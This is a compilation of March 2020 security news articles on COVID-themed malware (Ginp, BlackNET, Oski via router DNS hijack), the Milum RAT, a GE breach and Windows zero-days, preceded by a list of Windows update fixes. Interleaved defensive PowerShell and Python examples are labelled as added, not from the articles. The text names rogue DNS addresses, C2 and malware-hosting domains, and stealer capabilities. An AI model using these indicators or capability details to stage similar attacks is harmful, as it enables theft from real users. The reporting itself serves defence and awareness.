Addresses an issue that causes File Explorer to close unexpectedly when using roaming profiles between different versions of Windows 10.
Addresses an issue that fails to return search results in the Start menu Search box for users that have no local profile.
Addresses an issue that causes applications to close unexpectedly when a user enters East Asian characters after changing the keyboard layout.
Addresses an issue that prevents the mute button from working on certain devices with the Microsoft Your Phone app.
Addresses an issue that causes calendar dates to appear on the wrong day of the week in the clock and date region of the notification area when you select the Samoa time zone.
Addresses an issue in which table formatting fails in the PowerShell Integrated Scripting Environment (ISE) during a remote session. The error message is, "Remote host method get_WindowsSize is not implemented".
Addresses an issue with reading logs using the OpenEventLogA() function.
Addresses an issue that might cause domain controllers (DC) to register a lowercase and a mixed or all uppercase Domain Name System (DNS) service (SRV) record in the _MSDCS. DNS zone. This occurs when DC computer names contain one or more uppercase characters.
Addresses an issue that might cause a delay of up to two minutes when signing in or unlocking a session on Hybrid Azure Active Directory-joined machines.
Addresses an issue that causes authentication in an Azure Active Directory environment to fail and no error appears.
Addresses an issue that prevents machines that have enabled Credential Guard from joining a domain. The error message is "The server's clock is not synchronized with the primary domain controller's clock."
Addresses an issue that causes authentication to fail when using Azure Active Directory and the user’s security identifier (SID) has changed.
Addresses an issue that prevents some machines from automatically going into Sleep mode under certain circumstances because of Microsoft Defender Advanced Threat Protection (ATP) Auto Incident Response (IR).
Addresses an issue that prevents some machines from running Microsoft Defender ATP Threat & Vulnerability Management successfully.
Improves support for non-ASCII file paths for Microsoft Defender ATP Auto IR.
Addresses a performance issue with the Windows Runtime (WinRT) API that sends specific absorption rate (SAR) back-off values.
Addresses an issue in which a Windows.admx template is missing one of the SupportedOn tags.
Addresses an issue that prevents applications from closing.
Addresses an issue that creates the Storage Replica administrator group with the incorrect SAM-Account-Type and Group-Type. This makes the Storage Replica administrator group unusable when moving the primary domain controller (PDC) emulator.
Restores the constructed attribute in Active Directory and Active Directory Lightweight Directory Services (AD LDS) for msDS-parentdistname.
Addresses an issue with evaluating the compatibility status of the Windows ecosystem to help ensure application and device compatibility for all updates to Windows.
Addresses an issue that prevents Microsoft User Experience Virtualization (UE-V) settings from roaming to enable the signature files that are used for new messages, forwarded messages, and replies.
Addresses an issue that prevents the Network Policy Server (NPS) accounting feature from functioning. This occurs when NPS is configured to use SQL for accounting with the new OLE (compound document) database driver (MSOLEDBSQL.dll) after switching to Transport Layer Security (TLS) 1.2.
Addresses an issue that prevents standard user accounts that are configured with the maximum User Account Control (UAC) settings from installing Language Features On Demand (FOD) using the System settings.
Addresses an issue that causes attempts to complete the connection to a virtual private network (VPN) to fail; instead, the status remains at “Connecting.”


Ginp Mobile Banker Targets Spain with "Coronavirus Finder" Lure
28.3.2020  Bleepingcomputer  Mobil

In today's deluge of malicious campaigns exploiting the COVID-19 topic, handlers of the Android banking trojan Ginp stand out with operation Coronavirus Finder.

They prey on the anxiety generated by the massive spread of the virus and launch on infected devices a page claiming to show the location of infected people nearby for a small fee.

The purpose is to make victims provide payment card data in the hope of learning how close they are to infected individuals.

It's a particularly heinous campaign because it targets users in Spain, a country that's been hit hard by the new coronavirus: close to 3,000 people died from the virus and almost 40,000 are infected.

A loathsome lure
Ginp started in June 2019 as an SMS stealer and quickly evolved to a banking trojan, with code borrowed from Anubis, that targeted banks in Spain and the U.K.

In a recent version, the malware used the Accessibility feature in Android to show fake push notifications that make victims open apps for which Ginp had an overlay ready that asked for payment card data.

Researchers at Kaspersky are now seeing that Ginp operators are sending the malware a special command that opens a webpage called Coronavirus Finder.

The page claims that 12 people infected with the new coronavirus are in the vicinity of the victim and promises to show their location for 0.75 EUR.


This is just to lure the victim into providing their payment card data, which is delivered to the cybercriminals. Once the info is provided, nothing happens.

"They don’t even charge you this small sum (and why would they, now that they have all the funds from the card at their command?)," writes Alexander Eremin, malware analyst at Kaspersky, in a blog post today.


The source of inspiration for this lure may be the "Shield" mobile app recently released by the Israeli Ministry of Health, which alerts users if they've been at a location at the same time as a known Coronavirus carrier.

Telemetry data from Kaspersky shows that Ginp's main targets for this campaign are users in Spain. However, they warn that this operation may expand beyond Spain's territory.

"However, this is a new version of Ginp that is tagged “flash-2”, while previous versions were tagged “flash-es12”. Maybe the lack of “es” in the tag of the newer version means that cybercriminals plan to expand the campaign beyond Spain" - Alexander Eremin

These days, it is easy to render the new Ginp campaign ineffective: staying home ensures that you're at a safe distance from people carrying COVID-19 (check here for guidelines from WHO).

Also, in this time of public health crisis, governments are the entities with the most accurate information about the spread of the new coronavirus. If they make such an app available, they would not charge users for details on the current situation.

For mobile malware that does not use COVID-19 lures, following standard security recommendations should be enough to keep you safe:

install a reliable security solution
download apps from official sources
do not give apps other than antivirus permission to use the Accessibility feature
don't click on links from suspicious sources
don't provide sensitive information (access codes, logins, payment details) to forms that look suspicious


Adobe Fixes Critical Vulnerability in Creative Cloud Application
28.3.2020  Bleepingcomputer  Vulnerability

Adobe has released a security update for its Creative Cloud Desktop Application to fix a vulnerability that could allow attackers to delete files on a vulnerable computer.

The Adobe Creative Cloud is an application suite consisting of numerous apps such as Photoshop, Premiere Pro, Illustrator, Adobe Acrobat, InDesign, Lightroom, and XD.

Adobe normally releases its security updates on the second Tuesday of each month to align with Microsoft's Patch Tuesday.

This month, Adobe did not release any updates on Patch Tuesday but has instead been rolling them out as needed. For example, Adobe released security updates for Adobe Reader and Acrobat on March 17th.

In a new security bulletin released today, Adobe states that a 'Critical' vulnerability has been discovered in its Creative Cloud Desktop Application that could allow attackers to arbitrarily delete files on a computer.

This vulnerability is categorized as a 'Time-of-check to time-of-use (TOCTOU) race condition', which means that to exploit the vulnerability the attack would have to be timed in a precise way to achieve the desired results.

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
Time-of-check to time-of-use (TOCTOU) race condition | Arbitrary File Deletion | Critical | CVE-2020-3808
This also appears to be a local attack, which means that an attacker or malware would need to be running on the machine before attempting to exploit the vulnerability.

To resolve this vulnerability, users should upgrade to Creative Cloud Desktop Application version 5.1.


Microsoft Cuts Back More Office 365 Features to Handle High Load
28.3.2020  Bleepingcomputer  OS

Microsoft announced today new temporary changes to Office 365 services to adjust to the ever-increasing demand and the growing number of new Microsoft 365 customers working from home during the COVID-19 pandemic.

As detailed in the MC207439 announcement published today in the Office 365 Admin message center, Microsoft made several changes to OneNote, SharePoint, and Stream features in response to the high usage load.

"We've made some temporary service changes to prioritize core service functionality," Microsoft tweeted. "These changes are described in MC207439, which is available to service admins."

Last week, Microsoft made another series of tweaks to some non-essential Office 365 capabilities designed to deal with the growth in demand, reducing user presence check frequency, the interval at which the other party is shown as typing in chats, and the video resolution.

To get an idea of the number of new users actively using Office 365 services on a daily basis these days, the Microsoft Teams teamwork hub, one of its Office 365 enterprise subscription services, saw a huge influx of 12 million new daily active users within a single week, bringing the total to 44 million.

Microsoft 365 temporary feature changes
"As a part of our commitment to customers and Microsoft cloud services continuity during these unprecedented times, we're making temporary adjustments to select capabilities within Microsoft 365," today's announcement says.

The new adjustments include OneNote editing now being available only online, SharePoint video resolution being downgraded and backend operations being moved to after working hours, as well as Stream meeting recording video resolution automatically being set to 720p.

The full list of temporary adjustments to OneNote, SharePoint, and Stream features:

• OneNote:
- OneNote in Teams will be read-only for commercial tenants, excluding EDU. Users can go to OneNote for the web for editing.
- Download size and sync frequency of file attachments have been changed.
- You can find details on these and other OneNote-related updates at http://aka.ms/notesupdates.
• SharePoint:
- We are rescheduling specific backend operations to regional evening and weekend business hours. Impacted capabilities include migration, DLP and delays in file management after uploading a new file, video or image.
- Reduced video resolution for playback videos.
• Stream:
- People timeline has been disabled for newly uploaded videos. Pre-existing videos will not be impacted.
- Meeting recording video resolution adjusted to 720p
The announcement also says that Microsoft 365 services are actively monitored so that new feature adjustments can be made whenever needed to avoid high load and degradation of the user experience.

"Microsoft is actively monitoring performance and usage trends to ensure we're optimizing service for our customers worldwide, and accommodating new growth and demand," a Microsoft spokesperson told BleepingComputer when asked about the cause of these recent developments.

"At the same time, these are unprecedented times and we’re also looking at what steps we can take to proactively prepare for these high-usage periods."

MC207439 announcement

Microsoft cloud services continuity commitment
"As demand continues to grow, if we are faced with any capacity constraints in any region during this time, we have established clear criteria for the priority of new cloud capacity," Microsoft explained in a blog post published yesterday.

"Top priority will be going to first responders, health and emergency management services, critical government infrastructure organizational use, and ensuring remote workers stay up and running with the core functionality of Teams. We will also consider adjusting free offers, as necessary, to ensure support of existing customers."

These feature adjustments come on the heels of a large scale Microsoft Teams outage that took place last Monday, affecting EU and US users between March 16 and March 17, with chat messages not being sent, team member management not working, and the admin portal being unreliable.

Microsoft also announced on March 5th that Microsoft Teams will be free during the next six months to give businesses a helping hand while moving towards a remote workplace during the novel coronavirus outbreak.

"These are certainly unprecedented and challenging times. It is not business as usual," Redmond added. "But, together, we can and will get through this."


Unknown Hackers Use New Milum RAT in WildPressure Campaign
28.3.2020  Bleepingcomputer  Virus

Malware that shows no similarities with samples used in known campaigns is currently used to attack computers in various organizations. Researchers named the new threat Milum and dubbed the operation WildPressure.

Several samples of Milum were discovered in the wild at the end of last summer, with the first ones believed to have been created in March 2019.

Unknown threat actor
The first attacks using Milum were spotted last year in August, but Kaspersky’s GReAT (Global Research & Analysis Team) researchers believe that it has been making victims since at least the end of May 2019.

Looking at the malware code (C++), the researchers could not find clues that could help them attribute Milum to a certain adversary, not even with low confidence.

“Their C++ code is quite common,” writes Denis Legezo, Kaspersky senior security researcher, in a technical analysis published today. Even the configuration data and the way it is parsed (Standard Template Library) are common, hence insufficient for attribution.

Checking the list of known victims was not helpful either. Based on Kaspersky telemetry, Milum “was exclusively used to attack targets in the Middle East,” some of them being in the industrial sector.

In September 2019, the researchers were able to sinkhole one of the command and control (C2) domains (upiserversys1212[.]com) used for the WildPressure campaign and noticed that most of the connecting IP addresses were from the Middle East (Iran), while others were likely network scanners, TOR exit nodes, or VPN connections.

active Milum infections, source: Kaspersky
Milum is a new RAT
The malware is a fully-developed trojan with “solid capabilities for remote device management” of a compromised host. Its functionality includes the following:

Code | Meaning | Features
1 | Execution | Silently execute received interpreter command and return result through pipe
2 | Server to client | Decode received content in “data” JSON field and drop to file mentioned in “path” field
3 | Client to server | Encode file mentioned in received command “path” field to send it
4 | File info | Get file attributes: hidden, read only, archive, system or executable
5 | Cleanup | Generate and run batch script to delete itself
6 | Command result | Get command execution status
7 | System information | Validate target with Windows version, architecture (32- or 64-bit), host and user name, installed security products (with WQL request “Select From AntiVirusProduct WHERE displayName <>'Windows Defender'”)
8 | Directory list | Get info about files in directory: hidden, read only, archive, system or executable
9 | Update | Get the new version and remove the old one

Three samples analyzed by Kaspersky, all of them almost identical, showed a compilation timestamp in March. While this information can be spoofed, the researchers have other reasons to believe that Milum is a new threat.

One is that they did not record infections with this malware until March 31. Another is a field found in the HTTP POST requests when communicating with the C2 that indicates the malware version 1.0.1.

“A version number like this indicates an early stage of development. Other fields suggest the existence of, at the very least, plans for non-C++ versions.”

Whoever is behind WildPressure seems to identify their targets with code (clientID) unfamiliar to the researchers: “839ttttttt,” “HatLandid3,” and “HatLandid30.” Analyzed Milum samples had different clientIDs, indicating targeted attacks.

Milum configuration data, source: Kaspersky
Legezo told BleepingComputer over email that there are no visible hints that the WildPressure attackers plan to do more than collect information from targeted networks. He warns that this can change in time because the campaign is ongoing and could develop into a different type of attack.

"Analysts must pay attention because the consequences of an attack against an industrial target can be devastating," he says.


Windows Defender Fix For Windows 10: Enable Network Scanning
28.3.2020  Bleepingcomputer  OS

A really simple fix for the Windows Defender alert that states items were skipped during a scan has been discovered and it involves just enabling network scanning.

Over the weekend, we reported that for the past few weeks Windows 10 users were receiving alerts stating that items were skipped when they performed scans using Windows Defender.

These alerts stated that "Windows Defender Antivirus scan skipped an item due to an exclusion or network scanning settings" but did not provide any further information as to what was causing it.

Alert

Günter Born who first reported about this issue has now discovered a fix that just entails enabling the scanning of network files.

Strangely, Microsoft states in their documentation that scanning network files is not recommended, but leaving scanning disabled will continue to display these alerts.

"Indicates whether to scan for network files. If you specify a value of $False or do not specify a value, Windows Defender scans network files. If you specify a value of $True, Windows Defender does not scan network files. We do not recommend that you scan network files," Microsoft documentation states.

To enable network scanning, simply open a PowerShell (Admin) window and enter the following command:

Set-MpPreference -DisableScanningNetworkFiles 0
You can confirm that the change has been made by running the Get-MpPreference command before and after the above command, as shown below.

Before and after the Set-MpPreference command
For network scanning to be enabled, the DisableScanningNetworkFiles must be set to False.
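As an added example (not from the article or from Microsoft), the following PowerShell function wraps the check, change and verify steps above into one call: it reads DisableScanningNetworkFiles, enables network scanning only if it is currently off, and returns the value before and after so the change can be confirmed. It assumes an elevated PowerShell session on a machine with the Defender module available; the function name is the example's own.

```powershell
# Added example (not from the article or from Microsoft): checks the
# Defender network-file scanning preference, enables it if it is off, and
# reads the preference back so the change can be confirmed. Run elevated.
function Enable-DefenderNetworkScanning {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()

    # $true here means network scanning is DISABLED (see the documentation quoted above).
    $before = (Get-MpPreference).DisableScanningNetworkFiles

    if (-not $before) {
        Write-Verbose 'Network file scanning is already enabled; nothing to change.'
    }
    elseif ($PSCmdlet.ShouldProcess('Windows Defender preferences', 'Enable scanning of network files')) {
        # Equivalent to the article's "Set-MpPreference -DisableScanningNetworkFiles 0"
        Set-MpPreference -DisableScanningNetworkFiles $false
    }

    # Read the preference back rather than trusting that the Set call succeeded.
    $after = (Get-MpPreference).DisableScanningNetworkFiles
    [pscustomobject]@{
        DisableScanningNetworkFiles_Before = $before
        DisableScanningNetworkFiles_After  = $after
        NetworkScanningEnabled             = (-not $after)
    }
}

# Add -WhatIf to see what would change without changing it.
Enable-DefenderNetworkScanning -Verbose
```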

So what happened?
It seems that in the older Windows Defender engines network scanning was enabled by default.

In an older Windows 10 VM from right before the March Patch Tuesday updates, running Get-MpPreference clearly shows that network scanning is enabled in the older engines.

Older Windows Defender engines
After waiting a little while for the engines to update, you can see that the Windows Defender preferences show that network scanning has now been disabled by a newer engine.

Newer Windows Defender engines
It is not known why Microsoft decided to make this change, but the alerts appear to just indicate that network scanning was skipped.

If these alerts are bothering you, you can fix it by enabling network scanning as described above.


Fake Corona Antivirus Software Used to Install Backdoor Malware
28.3.2020  Bleepingcomputer  Virus

Sites promoting a bogus Corona Antivirus are taking advantage of the current COVID-19 pandemic to promote and distribute a malicious payload that will infect the target's computer with the BlackNET RAT and add it to a botnet.

The two sites promoting the fake antivirus software can be found at antivirus-covid19[.]site and corona-antivirus[.]com as discovered by the Malwarebytes Threat Intelligence team and researchers at MalwareHunterTeam, respectively.

While the former has already been taken down since Malwarebytes' report, the one spotted by MalwareHunterTeam is still active but has had its contents altered, with the malicious links removed and a donation link added to support the scammers' efforts — spoiler alert, no donations have been made so far.

The malicious site

"Download our AI Corona Antivirus for the best possible protection against the Corona COVID-19 virus," the site reads. "Our scientists from Harvard University have been working on a special AI development to combat the virus using a mobile phone app.

Last but not least, the malicious sites' makers also mention an update that will add VR sync capabilities to their fake antivirus: "We analyse the corona virus in our laboratory to keep the app always up to date! Soon a corona antivirus VR synchronization will be implemented!"

If anyone fell for this, they would end up downloading an installer from antivirus-covid19[.]site/update.exe (link is now down) that will deploy the BlackNET malware onto their systems if launched.

BlackNET will add the infected device to a botnet that can be controlled by its operators:

• to launch DDoS attacks
• to upload files onto the compromised machine
• to execute scripts
• to take screenshots
• to harvest keystrokes using a built-in keylogger (LimeLogger)
• to steal bitcoin wallets
• to harvest browser cookies and passwords.

The BlackNET RAT, which was rated as 'skidware malware' by MalwareHunterTeam, is also capable of detecting if it's being analyzed within a VM and it will check for the presence of analysis tools commonly used by malware researchers, per c0d3inj3cT's analysis.

BlackNET command panel
The malware also comes with bot management features including restarting and shutting down the infected devices, uninstalling or updating the bot client, and opening visible or hidden web pages.

One of the sites promoting this bogus Corona Antivirus was spotted by MalwareHunterTeam on March 6, while the other was exposed by Malwarebytes' Threat Intelligence team in a report published today.

In somewhat related news, an HHS.gov open redirect is currently abused by attackers to deliver Raccoon info-stealing malware payloads onto targets' systems via a coronavirus-themed phishing campaign.

The actors behind these ongoing phishing attacks use the open redirect to link to a malicious attachment that delivers a VBS script previously spotted while being employed by the operators behind Netwalker Ransomware to deploy their payloads.

The World Health Organization (WHO), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Federal Trade Commission (FTC) have all warned about Coronavirus-themed phishing and attacks targeting potential victims from countries around the globe (1, 2, 3).


Hackers Hijack Routers’ DNS to Spread Malicious COVID-19 Apps
28.3.2020  Bleepingcomputer  Hacking

A new cyber attack is hijacking routers' DNS settings so that web browsers display alerts for a fake COVID-19 information app from the World Health Organization that is actually the Oski information-stealing malware.

For the past five days, people have been reporting their web browser would open on its own and display a message prompting them to download a 'COVID-19 Inform App' that was allegedly from the World Health Organization (WHO).

After further research, it was determined that these alerts were being caused by an attack that changed the DNS servers configured on their home D-Link or Linksys routers to use DNS servers operated by the attackers.

As most computers use the IP address and DNS information provided by their router, the malicious DNS servers were redirecting victims to malicious content under the attacker's control.

Hijacking Windows NCSI active probes
At this time, it is not known how the attackers are gaining access to the routers to change their DNS configuration, but some users state that they had remote access to the router enabled with a weak admin password.

Once the attackers gained access to the router, they would change the configured DNS servers to 109.234.35.230 and 94.103.82.249, which would also be configured on most computers that connect to the router.

Configured with malicious DNS servers
When a computer connects to a network, Microsoft utilizes a feature called 'Network Connectivity Status Indicator (NCSI)' that is used to periodically run probes that check whether a computer is actively connected to the Internet.

In Windows 10, one of these active probes will be to connect to the http://www.msftconnecttest.com/connecttest.txt site and check if the returned content contains the string 'Microsoft Connect Test'.

If it does, then the computer is connected to the Internet and if it isn't, Windows warns that the Internet is not accessible.

For victims of this attack, when Windows performs this NCSI active probe, instead of being connected to the legitimate 13.107.4.52 Microsoft IP address, the malicious DNS servers send you to a web site located at 176.113.81.159.

As this IP address is under the attacker's control, instead of sending back a simple text file, they display a page prompting the victim to download and install a fake 'Emergency - COVID-19 Informator' or 'COVID-19 Inform App' from the WHO as shown below.

Msftconnecttest page promoting fake COVID-19 information app
If a user downloads and installs the application, instead of receiving a COVID-19 information application they will have the Oski information-stealing Trojan installed on their computer.

When launched, this malware will attempt to steal the following information from the victim's computer:

browser cookies
browser history
browser payment information
saved login credentials
cryptocurrency wallets
text files
browser form autofill information
Authy 2FA authenticator databases
a screenshot of your desktop at the time of infection, and more.
This information will then be uploaded to a remote server so that it can be collected by the attackers and used to perform further attacks on your online accounts.

This could be to steal money from bank accounts, perform identity theft, or further spear phishing attacks.

What you should do if affected by this attack
If your browser is randomly opening to a page promoting a COVID-19 information app, then you need to log in to your router and make sure you configure it to automatically receive its DNS servers from your ISP.

As every router has a different way of configuring DNS servers, it is not possible to give a specific method on how to do this.

In general, you will want to follow these steps:

Log in to your router
Find the DNS settings and make sure there are no servers, especially 109.234.35.230 and 94.103.82.249, manually configured. If they are, set the DNS servers setting to 'Automatic' or ISP assigned.
Then save your configuration.
You should now be able to reboot your mobile devices, game consoles, and computers so that they use the correct DNS settings from your ISP.
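An added example, not from the article, that automates the client-side part of these checks on a Windows machine: it compares the DNS servers the computer received from the router against the two rogue addresses quoted above, then performs the same NCSI probe Windows does and reports whether www.msftconnecttest.com resolves to the rogue host named in the article and whether connecttest.txt comes back with the expected content. The IP addresses are the ones the article quotes; the function names are the example's own.

```powershell
# Added example (not from the article). Checks a Windows client for the
# DNS hijack described above. Values below are the ones quoted in the article.
$RogueDnsServers = @('109.234.35.230', '94.103.82.249')
$RogueNcsiHost   = '176.113.81.159'
$NcsiProbeUrl    = 'http://www.msftconnecttest.com/connecttest.txt'
$NcsiExpected    = 'Microsoft Connect Test'

function Find-RogueDnsServers {
    # Returns one object per interface/server pair that uses a known rogue resolver.
    param([string[]]$RogueList = $RogueDnsServers)
    Get-DnsClientServerAddress -AddressFamily IPv4 |
        ForEach-Object {
            $cfg = $_
            $cfg.ServerAddresses |
                Where-Object { $RogueList -contains $_ } |
                ForEach-Object {
                    [pscustomobject]@{
                        Interface = $cfg.InterfaceAlias
                        DnsServer = $_
                    }
                }
        }
}

function Test-NcsiProbe {
    # Resolves the NCSI host with the machine's current resolvers and fetches
    # the probe file, as Windows does, then reports what came back.
    $ips = @(Resolve-DnsName -Name 'www.msftconnecttest.com' -Type A -ErrorAction SilentlyContinue |
             Where-Object { $_.Type -eq 'A' } |
             Select-Object -ExpandProperty IPAddress)
    $content = $null
    try {
        $resp = Invoke-WebRequest -Uri $NcsiProbeUrl -UseBasicParsing -TimeoutSec 10 -ErrorAction Stop
        $content = $resp.Content
    } catch {
        Write-Warning "NCSI probe request failed: $($_.Exception.Message)"
    }
    [pscustomobject]@{
        ResolvedTo        = ($ips -join ', ')
        ResolvesToRogue   = ($ips -contains $RogueNcsiHost)
        # A legitimate probe answer is the plain text 'Microsoft Connect Test';
        # a hijacked one returns an HTML page pushing the fake app instead.
        ContentAsExpected = ($null -ne $content -and $content.Trim() -eq $NcsiExpected)
    }
}

$rogue = @(Find-RogueDnsServers)
if ($rogue.Count -gt 0) {
    Write-Warning 'Known rogue DNS servers are configured on this machine:'
    $rogue | Format-Table -AutoSize
} else {
    Write-Host 'No known rogue DNS servers configured on this machine.'
}

$probe = Test-NcsiProbe
$probe | Format-List
if ($probe.ResolvesToRogue -or -not $probe.ContentAsExpected) {
    Write-Warning 'NCSI probe is not answered as expected; check the router DNS settings.'
}
```

A clean result only shows that this client is no longer pointed at the rogue resolvers; other devices on the network still need the router's DNS settings corrected.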

As people are reporting that they think their settings were changed because of a weak password and that remote administration was enabled, it is important to change your password to something stronger and to disable remote administration on the router.

Finally, if you downloaded and installed the COVID-19 app, you should immediately perform a scan on your computer for malware.

Once clean, you should change all of the passwords for sites whose credentials are saved in your browser and you should change the passwords for any site that you visited since being infected.

When resetting your passwords, be sure to use a unique password at every site.

Update 3/24/20: Security researcher Fumik0_ told BleepingComputer that based on the network traffic, this is the Oski information-stealer, not Vidar. Article updated.


Tech Giant GE Discloses Data Breach After Service Provider Hack
28
.3.2020  Bleepingcomputer   Incident

Fortune 500 technology giant General Electric (GE) disclosed that personally identifiable information of current and former employees, as well as beneficiaries, was exposed in a security incident experienced by one of GE's service providers.

GE is a multinational operating in a wide range of tech segments including aviation, power, healthcare, and renewable energy, and it is currently ranked by Fortune 500 as the 21st-largest company in the U.S. by revenue.

GE currently has customers in more than 180 countries and in excess of 280,000 employees according to the company's 2018 annual report.

Employees and beneficiaries' PII exposed
GE says in a notice of data breach filed with the Office of the California Attorney General that Canon Business Process Services (Canon), a GE service provider, had one of their employees' email accounts breached by an unauthorized party in February.

"We were notified on February 28, 2020 that Canon had determined that, between approximately February 3 - 14, 2020, an unauthorized party gained access to an email account that contained documents of certain GE employees, former employees and beneficiaries entitled to benefits that were maintained on Canon’s systems," the notification says.

GE also states that the sensitive personal information exposed during the incident was uploaded by or for current and former GE employees, as well as "beneficiaries entitled to benefits in connection with Canon’s workflow routing service."

Among the information the attacker gained access to during the breach, GE mentions:

[..] direct deposit forms, driver’s licenses, passports, birth certificates, marriage certificates, death certificates, medical child support orders, tax withholding forms, beneficiary designation forms and applications for benefits such as retirement, severance and death benefits with related forms and documents, may have included names, addresses, Social Security numbers, driver’s license numbers, bank account numbers, passport numbers, dates of birth, and other information contained in the relevant forms.
GE systems not breached
According to the notice of data breach, GE's systems were not affected by the Canon security breach, and the company is taking measures to prevent a similar incident from happening in the future.

"Canon is offering identity protection and credit monitoring services to affected individuals for two years at no cost to you through a company called Experian," the notice also says.

Affected individuals who receive the breach notification letters from GE have until June 30, 2020, to take advantage of these services.

GE has also set up a support hotline at 1-800-432-3450 that affected individuals can call between 9 AM and 5 PM Eastern time, Monday through Friday.

BleepingComputer has reached out to GE for more details but had not heard back at the time of this publication.

Update March 23, 18:33 EDT: When asked about the estimated number of current and former GE employees affected by the breach, a GE spokesperson sent the following statement:

We are aware of a data security incident experienced by one of GE’s suppliers, Canon Business Process Services, Inc. We understand certain personal information on Canon’s systems may have been accessed by an unauthorized individual. Protection of personal information is a top priority for GE, and we are taking steps to notify the affected employees and former employees.


Microsoft Warns of Hackers Exploiting Unpatched Windows Bugs
28
.3.2020  Bleepingcomputer  Exploit

Microsoft warned today of targeted attacks actively exploiting two zero-day remote code execution (RCE) vulnerabilities found in the Windows Adobe Type Manager Library and impacting all supported versions of Windows.

"Microsoft is aware of limited targeted attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released," the company says.

The two RCE security flaws exist in Microsoft Windows "when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format."

Microsoft has rated the vulnerabilities as Critical and says that they are impacting machines running desktop and server Windows releases, including Windows 10, Windows 8.1, Windows 7, and multiple versions of Windows Server.

Microsoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing guidance to help reduce customer risk until the security update is released. See the link for more details. https://t.co/tUNjkHNZ0N

— Security Response (@msftsecresponse) March 23, 2020
Microsoft is working on a fix
Microsoft says that a fix for the vulnerabilities is currently being developed and hints at a future release coming during next month's Patch Tuesday (on April 14).

"Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month," the advisory reads.

"This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers."

Users of Windows 7, Windows Server 2008, or Windows Server 2008 R2 are required to have an ESU license to receive future security updates fixing these issues (more information here).

On Windows 10 devices, successfully exploiting the two zero-day vulnerabilities will only lead to code execution with limited privileges and capabilities within an AppContainer sandbox context, according to Microsoft's advisory.

However, attackers could still potentially install programs, view, change, or delete data, or even create new accounts with full user rights.

To exploit the two security issues, attackers can either trick potential victims into opening maliciously crafted documents or to view them via the Windows Preview pane — the Outlook Preview Pane is NOT an attack vector.

To be clear and despite its name, this is *not* Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. After that, Microsoft took 100% responsibility for maintaining the code.

— Rosyna Keller (@rosyna) March 23, 2020
Zero-day workarounds
To reduce the risks of attacks abusing these two zero-days, Microsoft advises customers to disable the Preview and Details panes in Windows Explorer to prevent the automatic display of OTF fonts.

"While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability," Microsoft adds.

Disabling the WebClient service can also help protect vulnerable systems from ongoing attempts to exploit the flaws "by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service."

"After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet," Microsoft adds.

Renaming the actual library (ATMFD.DLL) to prevent potential exploits from working is another recommended workaround.

Detailed procedures on how to disable the Windows Explorer Preview/Details panes and the WebClient service, as well as on how to rename ATMFD.DLL on 32-bit and 64-bit systems are available in the security advisory.

CISA urges users to apply workarounds to address RCE vulnerabilities in Microsoft’s Adobe Type Manager Library being exploited in the wild. https://t.co/l3G5JBily2 #Cyber #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) March 23, 2020
Update March 24, 14:17 EDT: Microsoft says that Windows 10 systems are not targeted in ongoing attacks exploiting the two critical RCE vulnerabilities.

The threat is low for those systems running Windows 10 due to mitigations that were put in place with the first version released in 2015. Please see the mitigation section for details. Microsoft is not aware of any attacks against the Windows 10 platform.

The possibility of remote code execution is negligible and elevation of privilege is not possible. We do not recommend that IT administrators running Windows 10 implement the workarounds described below.

Microsoft recommends upgrading to the Windows 10 family of clients and servers.


HHS.gov Open Redirect Used by Coronavirus Phishing to Spread Malware
28
.3.2020  Bleepingcomputer  Virus

An HHS.gov open redirect is currently being used by attackers to push malware payloads onto unsuspecting victims' systems with the help of coronavirus-themed phishing emails.

Open redirects are web addresses that automatically redirect users between a source website and a target site, and are regularly used by malicious actors to send their targets to phishing landing pages or to deliver malware payloads under the guise of legitimate services.
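The usual root cause of an open redirect is a handler that forwards to whatever a query parameter names without checking that the destination stays on the site. The following is an added Python example, not code from the article or from the HHS application: it shows a validation routine that rejects the common bypasses (protocol-relative `//host`, backslash and `///` variants, `scheme:host` without slashes, userinfo tricks and non-http schemes), with `dcis.hhs.gov` used only as the sample allowed host and `attacker.example` as a placeholder destination.

```python
from urllib.parse import urlsplit


def is_safe_redirect(target, allowed_hosts):
    """Accept only same-site targets: a relative path, or an http(s) URL whose
    host is in `allowed_hosts` (lower-case hostnames)."""
    if not target or target[0].isspace() or target[0] == "\x00":
        return False
    # Browsers treat a backslash like a slash, so "/\host" becomes "//host".
    candidate = target.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:            # e.g. malformed IPv6 bracket syntax
        return False
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False              # javascript:, data:, file:, ...
    if parts.netloc:
        host = parts.hostname     # userinfo and port stripped, lower-cased
        return host is not None and host in allowed_hosts
    # No authority component: require exactly one leading slash.  Both
    # "//host" and "///host" would leave the site once the browser resolves them.
    return candidate.startswith("/") and not candidate.startswith("//")


def redirect_target(requested, allowed_hosts, fallback="/"):
    """Return `requested` if it passes validation, otherwise the on-site fallback.

    This is the check a login endpoint with a 'service'-style parameter would
    apply before issuing the 302 (an assumption for the example; the article
    does not describe the HHS endpoint's logic).
    """
    return requested if is_safe_redirect(requested, allowed_hosts) else fallback


if __name__ == "__main__":
    allowed = {"dcis.hhs.gov"}
    for sample in ["/cas/home", "https://dcis.hhs.gov/cas/home",
                   "//attacker.example/", "https:attacker.example",
                   "https://dcis.hhs.gov@attacker.example/"]:
        print(f"{sample!r:45} -> {redirect_target(sample, allowed)}")
```

The allowlist is the important design choice: comparing the parsed hostname against a fixed set is far more robust than string prefix checks, which the `host@attacker` and `host.attacker` forms above defeat.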

